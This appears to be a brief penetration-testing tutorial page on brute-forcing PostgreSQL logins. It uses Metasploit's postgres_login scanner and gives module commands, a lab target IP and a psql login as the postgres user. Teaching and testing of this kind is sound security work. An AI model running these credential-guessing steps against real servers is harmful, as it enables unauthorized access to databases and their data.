Attack PostgreSQL – This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.
Rapid 7
What is PostgreSQL?
PostgreSQL is a powerful, open source object-relational database system with over 30 years of active development that has earned it a strong reputation for reliability, feature robustness, and performance.
Port 5432 Vulnerabilities
Attacking PostgreSQL with Metasploit
use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > show optionsmsf5 auxiliary(scanner/postgres/postgres_login) > set BLANK_PASSWORDS truemsf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 172.16.74.129Attack PostgreSQL Server
msf5 auxiliary(scanner/postgres/postgres_login) > exploit
[email protected]:~# psql -h 172.16.74.129 -U postgres -W postgres
PostgreSQL Security
Table of Contents